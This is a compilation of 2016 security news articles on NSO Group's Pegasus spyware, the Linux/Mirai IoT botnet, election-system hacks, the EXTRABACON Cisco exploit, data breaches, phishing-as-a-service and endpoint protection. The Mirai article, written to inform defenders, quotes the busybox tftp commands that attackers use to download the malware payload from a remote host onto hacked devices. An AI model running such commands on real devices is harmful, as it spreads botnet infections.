NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers
The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for any Government to spy on mobile users, recently we have discussed the Trident vulnerabilities that were exploited by a surveillance software developed by the NSO Group to deliver the Pegasus malware.
But it could be very expensive if you decide to use the NSO Group’s software, according to The New York Times spy on 10 iPhones will cost $650,000, plus a $500,000 setup fee.
“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”
There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.
The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.
“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.
NSO Group
“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”
The New York Times has conducted further investigations on the NSO Group, the company that specializes its offer in surveillance applications for governments and law enforcement agencies around the world.
People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.
Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organization and terrorist groups.
Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.
“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”
Companies like the NSO Group operate in the dark, in a sort of “legal gray area,” despite the Israeli government exercises strict control of the export of such kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.
The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.
Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.
“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.
Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”
Linux/Mirai ELF, when malware is recycled could be still dangerous
6.9.2016 securityaffairs Virus
Experts from MalwareMustDie spotted a new ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices.
Experts from MalwareMustDie have analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.
The ELF Linux/Mirai is very insidious; it is still undetected by many antivirus solutions as confirmed by the very low detection ratio in the VirusTotal online scanning service.
“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.
The last ELF examined by Security Affairs was the Linux Trojan Linux.PNScan that has actively targeting routers based on x86 Linux in an attempt to install backdoors on them.
But MalwareMustDie tells us that Linux/Mirai “is a lot bigger than PnScan”.
And continues: “The threat was starting campaign in early August even if this ELF is not easy to be detected since it is not showing its activity soon after being installed: it sits in there and during that time, no malware file will be left over in system, all are deleted except the delayed process where the malware is running after being executed.”
This means that when the infections succeeded, it is not easy to distinguish an infected system by a not infected one, except than from the memory analysis, and we are talking about a kind of devices that are not easy to analyze and debug. The normal kind of analysis conducted from the file system or from the external network traffic doesn’t give any evidence, at the beginning.
We are in a hostile environment, called Internet of Things (IoT), shaping new kind of powerful Botnets spreading worldwide, but which Countries are more exposed to this kind of attack?
“Countries that are having Linux busybox IoT embedded devices that can connect to the internet, like DVR or Web IP Camera from several brands, and countries who have ISP serving users by Linux routers running with global IP address, are exposed as target, especially to the devices or services that is not securing the access for the telnet port (Tcp/23) service“
In fact seems that he continues, “the Linux/Mirai creators succeed to encode the strings and making diversion of traffic to camouflage themself. As is possible to see analyzing the samples, shown in the link to Virustotal the best detection is only “3 of 53” or “3 to 55.”
What is very important for all the sysadmins is to be provided by a shield against these infections: “along with the good friends involved in the open filtration system, security engineers are trying to push” – says again MalwareMustDie – “the correct filtration signature to alert the sysadmins if having the attacks from this threat. And on one pilot a sysadmins provided with the correct signatures, found the source attack from several hundreds of addresses within only a couple of days.”
Then it seems that the infection is really going widespread and the Botnet seems to be really very large.
At the moment for all the sysadmins who want to protect their systems there is a list of mitigations actions:
If you have an IoT device, please make sure you have no telnet service open and running.
Blocking the used TCP/48101 port if you don’t use it, it’s good to prevent infection & further damage,
Monitor the telnet connections because the Botnet protocol used for infection is the Telnet service,
Reverse the process looking for the strings reported in the MalwareMustDie detections tool tips.
But, what we know about this Linux/Mirai ELF malware exactly, and why it is not so common among the malware analysts?
“The reason why not so many people know it”, says MalwareMustDie – “is that antivirus thinks it is a variant of Gafgyt or Bashlite or Bashdoor. Then, the real samples of this malware is hard to get since most malware analysts have to extract it from memory on an infected device, or maybe have to hack the CNC to fetch those.”
This means that also the forensic analysis can be difficult if we switch off the infected device: all the information would be lost and maybe it would be necessary start again with a new infection procedure, in case. It remembers the Greek mobile wiretap named “Vodafone Hack”, no evidence than in the memory.
But in your opinion which is the main difference among the previous ELF malware versions?
“The actors are now having different strategy than older type of similar threat.” – says MalwareMustDie – “by trying to be stealth (with delay), undetected (low detection hit in AV or traffic filter), unseen (no trace nor samples extracted), encoded ELF’s ASCII data, and with a big “hush-hush” among them for its distribution. But it is obvious that the main purpose is still for DDoS botnet and to rapidly spread its infection to reachable IoTs by what they call it as Telnet Scanner. ”
The real insidiously of this ELF is that the only way to track it is to extract it from the memory of the running devices and there is not so much expertise among people that can “hack their own routers or webcam or DVR to get the malware binary dumped from the memory or checking the trace of infection.”
Digging in the details: how the infection works.
Attackers hacked IoT devices via SSH or Telnet account exploiting known vulnerabilities or using default passwords that were not changed by the owner of the targeted systems.
DVR surveilance
As we read in the last post on the MalwareMustDie blog, this kind of ELF uses a specific technique to fork into a new process if the conditions of the infection of the current device are targeted, otherwise the node is safe and the installation does not go on.
Once gained a shell access on the device, the attackers will download the payload of the ELF Linux/Mirai malware, below an example of the command launched on an IoT device to perform the operation:
‘busybox tftp‘ -r [MalwareFile] -g [IPsource]
‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]
It was very difficult to analyze the Linux/Mirai infection because once executed the malware is also able to delete traces of its presence.
“In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case, mostly you won’t get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.” continues the MalwareMustDie team.
“Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:”
/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (deleted)
/proc/{PID}/exe -> ‘./{long alphabet strings}’ (deleted)
While the process runs, the malware opens the PF_INET, a UNIX networking socket for TCP, and binds it to the port TCP/48101 from localhost IP address 127.0.0.1 and then starting to listen to the incoming connection. The malware forks to a new process with a new process PID, “the infected device will perform connection on telnet services on other devices for the further abuse purpose.”
The experts also provided a way to reverse a running process with a tool that will go open-source: for the details, enjoy the analysis.
Evidence on hacks of the US State Election Systems suggest Russian origin
6.9.2016 securityaffairs Hacking
Researchers have found links between the attacks on US state election systems and campaigns managed by alleged Russian state-sponsored hackers.
Security experts at threat intelligence firm ThreatConnect have conducted an analysis on the IP addresses listed in the flash alert issued in August by the FBI that warned about two cyber attacks against the election systems in two U.S. states.
The FBI confirmed that foreign hackers have penetrated state election systems, federal experts have uncovered evidence of the intrusion. The hackers violated the databases of two state election systems for this reason the FBI issued the flash alert to election officials across the country inviting them to adopt security measured to protect their computer systems.
“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility ofcyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.”reported Yahoo News that obtained a copy of the “flash” alert.
The FBI alert contains technical details about the attacks, including the IP addresses involved in the both attacks that have been analyzed by ThreatConnect.
The TTPs adopted by attackers suggest the involvement of Russian hackers, one of the IP addresses included in the alert has surfaced before in Russian criminal underground hacker forums. Some of the IPs are owned by the FortUnix Networks firm that was known to the security experts because its infrastructure was exploited by attackers that hit in December the Ukrainian power grid with the Black Energy malware.
The experts revealed that one of them was used in the past in spear-phishing campaigns that targeted the Justice and Development (AK) Party in Turkey, the Freedom Party in Germany, and the Ukrainian Parliament.
“However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spear phishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi.” states the analysis published by ThreatConnect”As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.”
The phishing campaigns mentioned in the analysis exploited an open source phishing framework named Phishing Frenzy, the security experts managed to hack into the control panel of the system used by the phishers and discovered a total of 113 emails written in Ukrainian, Turkish, German and English.
Out of the 113 total emails, 48 of them are malicious messages targeting Gmail accounts, while the rest were specifically designed to look like an email from an organization of interest for the victims.
16 of the malicious email used to target AK Party officials were also included in the WikiLeaks dump of nearly 300,000 AK Party emails disclosed in July.
The experts from ThreatConnect discovered some connections to a Russian threat actor, alleged linked to the Government of Moscow. One of the domains hosting the phishing content was registered with an email address associated with a domain known to be used by the infamous APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy).
Below the evidence collected by experts at ThreatConnect that suggest the involvement of the Russian Government, “but do not prove” it:
Six of the eight IP addresses belong to a Russian-owned hosting service
5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015
Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks
The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).
Enjoy the analysis.
NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers
Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group hacked into the arsenal of the NSA-Linked Equation Group leaked online data dumps containing its exploits.
ExtraBacon is one of the exploits included in the NSA arsenal, in August security experts have improved it to hack newer version of CISCO ASA appliance. The Hungary-based security consultancy SilentSignal has focused his analysis on the ExtraBacon exploit revealing that it could be used against the newer models of Cisco’s Adaptive Security Appliance (ASA).
The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA boxes and has now been expanded to 9.2.(4).
CISCO ASA Software 2
The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The EXTRABACON tool leverages on a flaw that resides in the Simple Network Management Protocol (SNMP) implemented by the ASA software.
“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.
“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”
At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.
Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).
Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.
The bad news
Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliance are still vulnerable to the EXTRABACON attack judging by the time of the last reboot.
The security duo scanned roughly 50,000 ASA devices that were identified in a previous reconnaissance and analysed the last time reboot times.
Some 10,000 of the 38,000 ASA boxes had rebooted within the 15 days since Cisco released its patch, an information that confirms that roughly 28,000 devices are still vulnerable because they were not patched. The remaining 12,000 devices did not provide the information of the last reboot.
Going deep into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency and a financial services company, and a large Japanese telecommunications provider.
What does it means?
It means that the above organizations are using vulnerable CISCO ASA Boxes if the following condition are matched:
the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it’s rare to see it working that way) and know the SNMP community string
an attacker must also have telnet or SSH access to the devices
Of course, the exploiting of ExtraBacon is not so simple, anyway, it is possible when dealing with persistent attackers.
“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.
“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”
“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”
The security duo is warning the above organisations which could not underestimate the risk of exposure to EXTRABACON attacks.
Porn Brazzersforum hacked, nearly 800,000 Brazzers Accounts Exposed
6.9.2016 securityaffairs Hacking
A data breach affected a the Brazzersforum resulting in the exposure of 800,000 accounts of the popular porn site Brazzers.
Another week starts with a data breach, roughly 800,000 accounts of the porn site Brazzers have been compromised. The data breach affected a separate forum, anyway, Brazzers users who never signed up to the forum may have been impacted.
The news was reported by Motherboard who received the dump from the data breach monitoring website Vigilante.pw. The leaked archive includes 928,072 records, 790,724 distinct email addresses, usernames and passwords in plaintext.
Motherboard journalists were supported by the popular security expert Troy Hunt to verify the authenticity of the leaked details, he confirmed a number of their details from the data dump belong to Brazzers users.
“This matches an incident which occurred in 2012 with our ‘Brazzersforum,’ which was managed by a third party. The incident occurred because of a vulnerability in the said third party software, the ‘vBulletin’ software, and not Brazzers itself.” explained Matt Stevens, a company spokesman.
The company downgraded the extension of the data breach explaining that only a small portion of users were impacted.
“That being said, users’ accounts were shared between Brazzers and the ‘Brazzersforum‘ which was created for user convenience. That resulted in a small portion of our user accounts being exposed and we took corrective measures in the days following this incident to protect our users,” Stevens added.
There is a strange particular emerged in the story, Motherboard contacted two Brazzers users to verify the authenticity of their data, both confirmed the genuinity of the records, but said that they had not accessed the Brazzersforum.
The forum allows Brazzers users to discuss porn content or to suggest new scenarios for future productions.
Brazzer forum runs the vBulletin, one of the most popular platforms for web forums. Old vBulletin versions are affected by several vulnerabilities easy to exploit, it is likely that hackers exploited one of them to steal the records.
At the time of writing, Brazzersforum is under maintenance.
Brazzers forum data breach
In response to the data breach Brazzers banned all the inactive accounts present in the dump.
“Note that the data provided contains many duplicates and non-functional accounts. We banned all non-active accounts in that list in case those usernames and passwords are re-used in the future,” Matt Stevens, public relations manager from Brazzers, told Motherboard.
“Brazzers takes the privacy and safety of its users very seriously,”
Hong Kong Government Hacked by APT3 Group before elections
4.9.2016 securityaffairs APT
Two Hong Hong government departments were targeted by Chinese hackers belonging the APT3 group just before the legislative elections.
Security experts from FireEye have discovered a new cyber espionage campaign launched by the Chinese APT3 group against Hong Kong Government before upcoming parliamentary elections that are to be held today September 4.
The hackers targeted two Hong Kong government departments to steal information related upcoming elections.
APT3 hackers used spear-phishing emails to lure victims to websites used to deliver malicious code on victims’ PC. According to FireEye, the malicious phishing emails claimed to include information about a report on election results, they include a link to the malicious website.
hongkong_web
APT3 was first spotted by FireEye in 2014, the ATP group was using exploits targeting recently disclosed vulnerabilities in Windows. The experts at FireEye speculated the APT3 is the same actor behind the “Operation Clandestine Fox” uncovered by the company in April 2014. The hackers exploited an IE zero-day vulnerability in a series of targeted attacks.
FireEye reported in a blog post the details of the attacks run by the APT3 that exploited the Windows OLE bug and also another Windows privilege escalation vulnerability (CVE-2014-4113).
Cyber espionage campaigns conducted to gather information about government and political activities in Southeast Asia are not a novelty, the Government of Beijing is one of the most active in this sense.
“Typically when we see government attacks on other governments, it’s about intelligence gathering and trying to gain access to information they can’t get via other means,” Bryce Boland, FireEye CTO for the Asia-Pac, told Agence France-Presse.
China always made political pressure on the local Honk Kong government to discredit political opponents and those candidates that fight for the independence of the country.
Leakedsource breach notification service reported two Bitcoin Data Breaches
4.9.2016 securityaffairs Hacking
Now LeakedSource disclosed details from two Bitcoin data breaches that affected the bitcoin exchange BTC-E.com and the discussion forum Bitcointalk.org.
The data breach notification service LeakedSource is becoming familiar to my readers, recently it reported the data breach suffered by many IT services, including Last.fm and DropBox, both occurred in 2012. Now LeakedSource disclosed details from two Bitcoin data breaches that affected the Bitcoin sector, the incident were suffered by the bitcoin exchange BTC-E.com and the bitcoin discussion forum Bitcointalk.org.
The incident occurred at the Bitcointalk.org was disclosed in May when the servers of the forum were compromised by attackers.
Segui
BitcoinTalk @bitcointalk
Server compromised due to social engineering against ISP NFOrce. There will be extended downtime for forensic analysis and reinstall.
03:14 - 22 Maggio 2015
227 227 Retweet 84 84 Mi piace
“The forum’s ISP NFOrce managed to get tricked into giving an attacker access to the server. I think that the attacker had access for only about 12 minutes before I noticed it and had the server disconnected, so he probably wasn’t able to get a complete dump of the database. However, you should act as though your password hashes, PMs, emails, etc. were compromised.” was reported on Reddit by the theymos user.”The forum will probably be down for 36-60 hours for analysis and reinstall. I’ll post status updates on Twitter @bitcointalk and I’ll post a complete report in a post in Meta once the forum comes back online.”
“each password has a 12-byte unique salt. The passwords are hashed with 7500 rounds of SHA-256.” he added.
LeakedSource reported that 499,593 user details were stolen in the incident, the leaked records include usernames, passwords, emails, birthdays, secret questions, hashed secret answers and some other internal data.
91% of passwords were hashed with sha256crypt, the experts explained that and that it would take about a year to crack an estimated 60-70% of them.
9% were hashed with MD5 and all were protected with the same salt value, LeakedSource has already cracked approximately 68% of those.
bitcoin
More mysterious was the BTC-E.com incident, it is possible that hackers also compromised some users’ wallets stealing bitcoins.
Despite the LeakedSource’s notification, there is no news about incidents occurred to BTC-E customers.
In January 2016 the Financial Underground Kingdom blog reported that the exchange has suffered one hack without effects for its customers, it is likely the data leaked by LeakedSource are related that incident.
“During years of existance [BTC-E] had just 1 hack after which the owners paid all the debt to users.”
It isn’t clear whether that hack and the data disclosure made by LeakedSource refer to the same incident. LeakedSource reported that that BTC-E.com was hacked in October 2013 and 568,355 users were impacted.
The passwords were protected with an unknown hashing method, making the “passwords completely uncrackable although that may change.”
Fake-Game offers a Phishing-as-a-Service platform to wannabe criminals
4.9.2016 securityaffairs Spam
Experts from Fortinet discovered a Russian website called Fake-Game the offers a Phishing-as-a-Service platform to anyone.
The Phishing attacks are still one of the most effective methods to grab users’ credentials on the web.
Experts from Fortinet have discovered a Russian-language site called ‘Fake-Game’ that offers Phishing-as-a-Service.
“During our monitoring, we discovered that this same business model is also being used in phishing schemes in the form of a Russian website called “Fake-Game.” Appearing in (at least) July 2015, Fake-Game offers a Phishing-as-a-Service (PHaaS) platform to anyone who signs up on their website:” reads a blog post published by Fortinet.
“You’ve come to the site to hijack accounts,” reads the translation of the message that the website displays.
The website is free to use, but it also offers a paid version for VIP accounts that includes additional features such as the possibility to browse all other phished accounts.
The Fake-game was used to hack into over 688,610 accounts, this is what the authors claim, it is easy to use and includes also video tutorials.
Users only have to choose which type of credential they wish to grab (i.e. Facebook, Instagram, Google, etc.)
The Fake-Game then generates a URL with a unique ID for each user.
“The link is appended by an affiliate ID which, in this case, is our subscriber’s ID. This allows the website to track which stolen accounts belong to which subscriber.” continues the Fortinet post.
“A subscriber can then spread the phishing site to prospective victims. Once a victim enters a credential into the subscriber’s phishing link, a prompt showing the stolen information appears:”
The Fake-Game is a classic example of crime-as-a-service, similar services allow wannabe criminals to rent infrastructure and service to easily enter the cyber criminal arena.
Fake-Game users only need to trick victims into clicking on the Phishing URL.
Crime-as-a-service dramatically lowers the barrier for entry in the cyber criminal ecosystem.
Dutch Police Seize Two VPN Servers, But Without Explaining... Why?
3.9.2016 thehackernews Security
Recently, two European countries, France and Germany, have declared war against encryption with an objective to force major technology companies to built encryption backdoors in their secure messaging services.
However, another neighborhood country, Netherlands, is proactively taking down cyber criminals, but do you know how?
Dutch Police has seized two servers belonging to Virtual Private Network (VPN) provider Perfect Privacy, as part of an investigation, without even providing any reason for seizures.
Switzerland-based VPN provider said they came to know about the servers seizure from I3D, the company that provides server hosting across Rotterdam.
For those unfamiliar, Virtual Private Networks or VPNs are easy security and privacy tools that route your Internet traffic through a distant connection, protecting your browsing, hiding your location data and accessing restricted resources.
VPNs have now become a great tool not just for large companies, but also for individuals to improve their privacy and security online, dodge content restrictions and counter growing threat of cyber attacks.
While many people, including digital activists, journalists, and protesters, use them for legitimate purposes, VPNs are also used by criminals and black hat hackers to protect their nefarious activities from prying eyes and stay anonymous online.
This is why VPN services are frequently targeted by police and law enforcement while investigating crimes, and this is what appears to have happened with two servers belonging to Perfect Privacy.
The VPN provider informed its customers that two of its servers in Rotterdam, Netherlands had been seized by the Dutch police on Thursday, August 24, without even contacting the company to inform about a possible investigation or the reason why their servers were brought down.
The VPN provider says the authorities went directly to I3D with a subpoena requesting the hardware.
"Currently, we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster," Perfect Privacy explains. "Since we are not logging any data there is currently no reason to believe that any user data was compromised."
Perfect Privacy confirms that the company was back up and running the following day after I3D provided two replacement servers, meaning that the seizures did not result in any significant outage.
In April, Dutch Police seized Ennetcom servers based in the Netherlands and Canada to shut down their operations during a criminal investigation. Ennetcom was a company that sold customized Blackberry Phones with the secure PGP-encrypted network.
Dutch authorities accused Ennetcom of helping criminals protect their communications to carry out crimes, involving drug trafficking, assassinations, and other serious offenses.
Hacker Who Hacked Official Linux Kernel Website Arrested in Florida
3.9.2016 thehackernews Hacking
Around five years after unknown hackers gained unauthorized access to multiple kernel.org servers used to maintain and distribute the Linux operating system kernel, police have arrested a South Florida computer programmer for carrying out the attack.
Donald Ryan Austin, a 27-year-old programmer from of El Portal, Florida, was charged Thursday with hacking servers belonging to the Linux Kernel Organization (kernel.org) and the Linux Foundation in 2011, the Department of Justice announced on Thursday.
The Linux Kernel Organization runs kernel.org servers for distributing the Linux operating system kernel, which is the heart of the operating system, whereas the Linux Foundation is a separate group that supports kernel.org.
According to an indictment [PDF] unsealed by federal prosecutors on Monday, Austin managed to steal login credentials of one of the Linux Kernel Organization system administrators in 2011 and used them to install a hard-to-detect malware backdoor, dubbed Phalanx, on servers belonging to the organization.
But what made the breach much significant? It's the open-source operating system that's being used by Millions of corporate and government networks worldwide.
Using the Phalanx malware, Austin allegedly installed Ebury – a Trojan designed for Linux, FreeBSD or Solaris hacking – on a number of servers run by the Linux groups, which helped him gain access to the login credentials of people using the servers.
Austin allegedly infected Linux servers, including "Odin1," "Zeus1," and "Pub3," which were leased by the Linux Foundation for operating kernel.org. He also hacked the personal email server of Linux Kernel Organization’s founder Peter Anvin.
Austin is also accused of allegedly using his unauthorized admin privileges to insert messages into the system that would display when the servers restarted.
According to prosecutors, Austin's motive for the intrusion was to gain early access to Linux software builds distributed through the www.kernel.org website.
Bad Luck! Hacker Arrested while Breaking Traffic Rules
This security breach forced the Linux Foundation to shut down kernel.org completely while a malware infection was cleared up, and rebuild several of its servers. Miami Shores Police stopped Austin while breaking traffic rules on August 28 and then arrested after identified as a suspect in 2011 case.
Austin is charged with 4 counts of "intentional transmission causing damage to a protected computer." He was released from jail on a bond of $50,000 provided by the family of his girlfriend.
Judge has ordered Austin to stay away from the Internet, computers, and every type of social media or e-mail services, due to his "substance abuse history."
Austin is scheduled to appear in San Francisco federal court on September 21 before the Honorable Sallie Kim, and if found guilty, he faces a possible sentence of 40 years in prison as well as $2 Million in fines.
Přichází nová generace ochrany koncových bodů
3.9.2016 Zabezpečení
Platformy nové generace ochrany koncových bodů (Next Generation Endpoint Protection, NGEPP) spíše, než by hledaly signatury malwaru, jak to dělá tradiční antivirový software, analyzují procesy, změny a připojení, aby tak rozpoznaly aktivitu, která naznačuje nečestné chování. Přestože je tento přístup lepší při zachytávání exploitů nultého dne, i zde existují problémy.
Potíže s novou generací ochrany mohou být různé. Například zprávy o činnosti zařízení lze shromažďovat pomocí klientského softwaru i bez něj.
Podniky se tedy rozhodují, zda použít řešení bez klienta a získávat méně podrobné informace o hrozbách, nebo shromažďovat bohaté podrobnosti, ale s nutností řešit problémy s nasazením, správou a aktualizací, spojené s instalací agentů.
Potom nastává volba, jak zjistit důkazy, že probíhá invaze, a jak se přitom neutopit v záplavě shromážděných dat. Jakmile dojde k odhalení útoků, musejí organizace najít způsob jejich nejrychlejšího zablokování.
Mezi dodavatele, kteří se snaží vyřešit tyto problémy, patří i společnosti se širokou řadou produktů, jako jsou například Cisco nebo EMC, zavedení dodavatelé zabezpečení, jako jsou Bit9+Carbon Black FireEye, ForeScout, Guidance Software, Trend Micro a další, a také novější firmy zaměřené na zabezpečení koncových bodů, jako firmy Cylance, Light Cyber, Outlier Security nebo Tanium.
Je to jen malý vzorek, protože je toto pole přeplněné a konkurenti přicházejí s různými způsoby, jak problémy zvládnout.
Hodnota platforem pro ochranu koncových bodů je v tom, že dokážou identifikovat specifické útoky a urychlit reakci na ně poté, co dojde k jejich detekci. Dělají to tak, že shromažďují informace o komunikaci mezi koncovými body a ostatními zařízeními v síti stejně jako změny vykonané v koncovému bodu samotném, které mohou znamenat ohrožení.
Databáze této telemetrie koncových bodů se potom stává forenzním nástrojem pro zkoumání útoků, mapování jejich rozvoje, zjišťování zařízení, která potřebují nápravu, a případnou predikci možných budoucích hrozeb.
Agent, nebo ne?
Hlavní averze vůči agentům obecně spočívá v tom, že jsou dalším softwarem, který je nutné nasadit, spravovat a aktualizovat. V případě nové generace ochrany koncových bodů poskytují obrovské množství jinak nezískatelných dat o koncových bodech, ale to může být také nevýhoda.
Agenti koncových bodů nashromáždí tolik informací, že může být obtížné odlišit útoky od tzv. šumu pozadí, takže je důležité, aby se práce těchto agentů podpořila analytickým strojem, který dokáže takový objem dat zvládnout, upozorňuje Lawrence Pingree, analytik Gartneru. Množství generovaných dat se liší podle agentů a typů koncových bodů.
Bez agenta mohou platformy ochrany koncových bodů stále shromažďovat cenná data o činnosti zařízení napojením se na přepínač nebo směrovač a sledováním síťových služeb Windows (Windows Network Services) a WMI (Windows Management Instrumentation).
Tyto údaje mohou zahrnovat informace, kdo je přihlášen k zařízení, co uživatel dělá, úrovně oprav, zda běží další agenti zabezpečení, zda jsou připojena USB zařízení, jaké běží procesy a podobně.
Analýza může odhalit, zda zařízení vytvářejí připojení mimo očekávaný rámec, což je možným příznakem bočního pohybu útočníků, kteří hledají způsoby napadení dalších počítačů a eskalace privilegií.
Použití agentů může znamenat nutnost mít další konzoli pro správu, což představuje větší složitost a potenciálně vyšší náklady, upozorňuje Randy Abrams, ředitel výzkumu ve společnosti NSS Labs, která zkoumá platformy NGEPP.
„V určitém bodě to povede i k rozdílu v počtu pracovníků,“ vysvětluje Abrams a dodává: Pro správu všech konzolí může být třeba větší množství personálu, a to se promítá do vyšších nákladů.
Je to také záležitost kompatibility, tvrdí Rob Ayoub, také jeden ze šéfů výzkumu ve společnosti NSS Labs. „Jak zajistíte, aby libovolní dva agenti spolupracovali, a komu zavoláte, pokud kooperovat nebudou?“
Bezpečnost řízení a správy těchto platforem by se měla kontrolovat také, upozorňuje Pingree, aby se minimalizovalo ohrožení platforem samotných od interních útočníků.
Podniky by měly hledat produkty ochrany koncových bodů s nástroji, které umožňují různé úrovně přístupu pro personál IT, jenž má rozdílné role. Bylo by například užitečné povolit omezený přístup pro správce, zatímco inženýři reagující na incidenty by měli větší přístup, vysvětluje Pingree.
Analytické stroje
Analýza je nezbytná, ale také složitá, a to natolik, že to může být samostatná služba, jako je například ta, kterou nabízí společnost Red Canary.
Namísto shromažďování dat z koncových klientů pomocí vlastních agentů využívá senzory dodávané společností Bit9+CarbonBlack. Red Canary tato data obohatí o zpravodajské informace o hrozbách, získané od různých dalších komerčních bezpečnostních firem, vše analyzuje a generuje varování o narušeních, která najde v sítích svých zákazníků.
Tento analytický stroj označí potenciální problémy, ale kontrolu označených událostí vykonávají lidé – analytici, aby ověřili, zda jde o skutečné hrozby. To analytikům podnikového zabezpečení pomáhá omezit počet varování, na která musejí reagovat.
